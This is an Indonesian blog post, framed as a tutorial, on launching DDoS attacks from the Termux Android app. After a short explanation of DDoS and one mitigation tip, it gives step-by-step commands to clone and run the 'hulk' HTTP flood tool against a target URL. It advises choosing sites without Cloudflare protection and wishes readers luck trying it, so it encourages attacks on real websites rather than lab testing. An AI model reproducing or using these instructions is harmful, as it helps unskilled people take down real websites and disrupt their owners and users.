Iklan Billboard

Cara DDOs Attack Dengan Termux | 100% Work


DDoS adalah jenis serangan DOS di mana beberapa sistem ini dikompromikan, yang sering terinfeksi oleh Trojan, dan digunakan untuk menyerang sistem tunggal yang menyebabkan serangan Denial of Service (DoS). Para korban serangan DDoS terdiri dari tujuan akhir dari kedua sistem dan semua sistem jahat digunakan dan dikendalikan oleh peretas dalam serangan yang didistribusikan.

Cara kerja serangan DDoS

Dalam serangan DDoS, lalu lintas yang datang secara bersamaan dan berpotensi ratusan ribu atau lebih (Flooding) memasuki server tersebut dari berbagai sumber. Ini secara efektif tidak mungkin dibuat atau ditangani untuk menghentikan serangan hanya dengan memblokir satu alamat IP; Plus, sangat sulit untuk membedakan lalu lintas pengguna yang sah dari lalu lintas serangan ketika menyebar dengan begitu banyak pengguna IP yang berbeda.

BACA JUGA : Cara DDOs Attack Tanpa Tools 

Tujuan dari serangan DDoS ini adalah untuk menghabiskan semua bandwidth yang tersedia antara target dan Internet. Caranya adalah dengan menghasilkan banyak lalu lintas, misalnya menggunakan botnet.

Cara Mudah Mengatasi Serangan DDos

Dalam hal mengelola pengaturan jaringan, ada beberapa langkah teknis yang dapat diambil untuk mengurangi beberapa efek serangan, beberapa di antaranya sangat sederhana. Misalnya

Dengan meningkatkan bandwidth, jika Kamu masih dapat meningkatkan bandwidth, metode ini dapat dicoba untuk memberi waktu sistem tidak turun Jika serangan DDoS terlalu penting, metode ini mungkin tidak memiliki banyak efek pada manajemen.

Cara Melakukan Serangan DDos Dengan Termux

Pertama Install Aplikasi Termux download dari Playstore

Jika sudah menginstall ketikkan :

$ apt update && upgrade

$ pkg install git
$ pkg install python2
$ git clone https://github.com/ujjawalsaini3/hulk

Jika Sudah terinstall cek dengan mengetikkan :

$ cd hulk
$ chmod +x hulk.py

$ python2 hulk.py "Url Target"



Saran untuk mencoba trik sederhana ini cari website yang menggunakan protokol HTTP. Jika berhasil website akan down seperti ini :




Jangan membuang paket datamu dengan melakukan serangan DDos menyerang website yang sudah mengaktifkan atau memakai cloudflare apalagi website tersebut menggunakan fitur under attack mode. Silahkan cari target lain!

BACA JUGA : Aplikasi DDoS Di Windows Terbaik

Dan itulah artikel tentang Cara DDOs Attack Dengan Termux selamat mencoba.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel